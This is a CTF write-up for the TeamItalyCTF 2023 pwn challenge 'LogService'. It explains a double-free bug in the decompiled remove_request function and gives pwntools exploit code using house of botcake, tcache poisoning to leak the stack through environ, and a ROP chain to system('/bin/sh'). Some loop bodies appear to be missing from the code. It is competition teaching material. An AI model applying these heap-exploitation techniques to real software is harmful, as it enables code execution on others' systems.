
# TeamItalyCTF 2023

## [pwn] LogService (13 solves)

## Analyzing the binary

the program is simple, allows to add, remove, view and save requests like any standard heap challenge.

By analyzing the "remove_request" function we can see the bug that allows to duplicate a pointer in the array it remains accessible because n_requests isn't decremented.
void __fastcall remove_request()
unsigned int ptr; // [rsp+0h] [rbp-10h] BYREF
int i; // [rsp+4h] [rbp-Ch]
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
fread(&ptr, 4uLL, 1uLL, stdin);
if ( ptr < n_requests )
free(*((void **)requests + ptr));
for ( i = ptr; i < n_requests - 1; ++i )
*((_QWORD *)requests + i) = *((_QWORD *)requests + i + 1);
send_message(0LL, 2LL, "OK");
send_message(1LL, 11LL, "invalid idx");

we can notice it in gdb too by adding 3 requests and remove the first one.
pwndbg> x/3gx 0x55da9e164330
0x55da9e164330: 0x000055da9e164370 0x000055da9e164400
0x55da9e164340: 0x000055da9e164400

## Exploiting the bug
To exploit the double free there are 2 ways "fastbin attack" or "house of botcake", i prefer the last one because is stronger.
first of all i leaked heap then exploited `house of botcake` and leaked libc too.
add_request(0x80, b"a"*0x80)
add_request(0x80, b"a"*0x80)
heap = decrypt(u64(show(0)[:8])) - 0x2a0
for i in range(12):
add_request(0x100, b"a"*0x100)

for i in range(7):

lib = u64(show(13)[:8])-0x219ce0
libc.address = lib

add_request(0x100, b"a"*0x100)

here there again 2 ways to exploit: angry fsrop or leaking stack to rop.
I went for the second one.
Leaking stack is a bit hard because you can't just allocate on `environ` and read it but you have to allocate on array of buffer write the pointer and then use `show` function.

k = (heap + 0x11b0)>>12 # key
chunks = heap + 0x1560-0x90 # array of buffer
big_chunk = heap + 0x10f0 # overlapping chunk
victim_chunk = heap + 0x11b0 # overlapped chunk

payload = cyclic(0xb0) + p64(0) + p64(0x111) # size
payload += p64((chunks)^k) # fwd
payload += b"A"*(0x1c0-len(payload)) # offset
add_request(0x1c0, payload)

add_request(0x100, b"a"*0x100)

payload = b"\x00"*0x88 #offset
payload += p64(0xa1) # size
# buffer i need
payload += p64(libc.sym["environ"])
payload += p64(big_chunk)
payload += p64(big_chunk)
payload += p64(victim_chunk)
payload += b"A"*(0x100-len(payload)) # offset
add_request(0x200, b"a"*0x200) # this is to don't reallocate array while writing on it
add_request(0x100, payload)

stack = u64(show(0)[:8])

Now i only need to repeat exploit to allocate a chunk on the stack and rop. To exploit again i free the overlapping chunks and reallocate them.
rbp = stack-0x148
payload = cyclic(0xb0) + p64(0) + p64(0x111)
payload += p64((rbp)^k)# fwd
payload += b"A"*(0x1c0-len(payload))
add_request(0x1c0, payload)
add_request(0x100, b"a"*0x100)
rop = ROP(libc)
chain = p64(rop.ret.address) + p64(rop.rdi.address) + p64(next(libc.search(b"/bin/sh"))) + p64(libc.sym["system"])
chain += b"a"*(0x100-8-len(chain))
add_request(0x100, b"a"*8+chain)

sl(b"cat flag")


Original writeup (https://github.com/TeamItaly/TeamItalyCTF-2023/blob/master/LogService/README.md).